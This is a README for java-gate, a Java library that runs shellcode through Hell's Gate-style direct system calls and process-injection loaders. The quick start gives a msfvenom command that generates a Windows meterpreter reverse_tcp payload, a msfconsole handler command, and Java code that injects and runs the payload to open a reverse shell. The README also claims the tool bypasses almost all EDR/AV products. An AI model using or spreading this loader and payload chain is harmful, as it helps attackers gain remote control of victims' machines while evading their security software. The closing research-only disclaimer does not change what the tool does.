java-gate

Chinese documentation

The java-gate project lets simple Java code use the family of direct-system-call techniques known as "Hell's Gate".

byte[] shellcode = new byte[] {(byte)0xfc, (byte)0x48, ...};
HellsGate gate = new HellsGate(shellcode);
gate.exec();

It supports several techniques that evolved from "Hell's Gate", such as "Halo's Gate", "Recycled Gate" and "Tartarus Gate". Besides the system-call functions, it provides many common shellcode injection techniques, such as APC injection and remote thread injection. The native part is written in C and NASM/MASM assembly and is called from the Java layer through JNI, so these low-level techniques can be driven from a few lines of Java.

Introduction

Why the name "java-gate": the project mainly integrates direct-system-call techniques such as Hell's Gate and Halo's Gate, hence "Java Gate". The name can also be read as a gateway between Java and the underlying system.

Note:

Quick Start

(1) Add the jitpack repository to your Maven configuration:

<repositories>
    <repository>
        <id>jitpack.io</id>
        <url>https://jitpack.io</url>
    </repository>
</repositories>

(2) Import the project:

<dependency>
    <groupId>com.github.4ra1n</groupId>
    <artifactId>java-gate</artifactId>
    <version>0.0.2</version>
</dependency>

(3) Obtain the shellcode

Here, meterpreter is used as an example.

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=YOUR-PORT -f java

(4) Start the msfconsole listener

msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT YOUR-PORT;run;"

(5) Write a test program

package me.n1ar4;

import me.n1ar4.gate.core.HellsGate;

public class Main {
    public static void main(String[] args) {
        byte buf[] = new byte[]
                {
                        (byte) 0xfc, (byte) 0x48, ...
                };
        HellsGate gate = new HellsGate(buf);
        gate.exec();
    }
}

(6) Receive the session

The meterpreter session is established in msfconsole.

The system-call modules are listed below. Usage is the same as in the example above; only the class name changes.

| Module | Class | Description | Optional |
|---|---|---|---|
| hells-gate | me.n1ar4.gate.core.HellsGate | Hells Gate | / |
| halos-gate | me.n1ar4.gate.core.HalosGate | Halos Gate | / |
| recycled-gate | me.n1ar4.gate.core.RecycledGate | Recycled Gate | / |
| ssn-syscall | me.n1ar4.gate.core.SSNSyscall | SSN Syscall | / |
| tartarus-gate | me.n1ar4.gate.core.TartarusGate | Tartarus Gate | / |

The loader modules are listed below. Usage is the same as in the example above; only the class name changes (the "Optional" column gives the extra argument a loader takes, if any).

| Module | Class | Description | Optional |
|---|---|---|---|
| apc1 | me.n1ar4.gate.loader.APC1Loader | APC injection using NtTestAlert | / |
| apc2 | me.n1ar4.gate.loader.APC2Loader | Simple thread-based APC injection | / |
| crt | me.n1ar4.gate.loader.CRTLoader | Simple remote thread injection | Process name |
| divide | me.n1ar4.gate.loader.DivideLoader | Create a process and inject into it | / |
| early-bird | me.n1ar4.gate.loader.EarlyBirdLoader | Create a new process and APC inject | / |
| etwp | me.n1ar4.gate.loader.EtwpLoader | EtwpCreateEtwThread-based injection | / |
| rip | me.n1ar4.gate.loader.RIPLoader | Modify the thread context RIP register and execute shellcode | / |

The command-line tool is used as follows:

java -jar java-gate.jar [module] [shellcode-hex-string] [optional]

Because the JVM may crash, there is also a mode that spawns a new process and executes the code there:

java -jar java-gate.jar run-new-jvm [module] [shellcode-hex-string]

If you want to use this mode from your own code, see JavaGate#runNewJVM.

Build

Pre-built packages are available in the "Release" section, but if you do not trust them or need to add your own features, you can build manually by following these steps:

Note that this project only supports 64-bit Windows with a 64-bit JVM, so it can only be compiled and built in that environment.

(1) MSVC x64

The CMake toolchain uses MSVC x64, and most of the assembly is assembled with ml64 from MSVC.

(2) CMake 3.x

The C and assembly code is built with CMake, which produces the DLL loaded through JNI. CLion is recommended.

(3) NASM

Most of the assembly is assembled with MASM, but some of it uses NASM, which must be downloaded separately and added to the PATH.

(4) JDK 8 & Maven

The Java part is built with Java 8 and Maven. IDEA is recommended.

(5) Python 3.x

Python is used only for some auxiliary tools and is not required.

Some tests

Bypasses almost all EDR/AV

References and Acknowledgements

Many thanks to the following excellent projects for providing code (most of the code in this project is based on them):

Disclaimer

This tool is intended for cybersecurity research and educational purposes only. It should not be used for any illegal activities.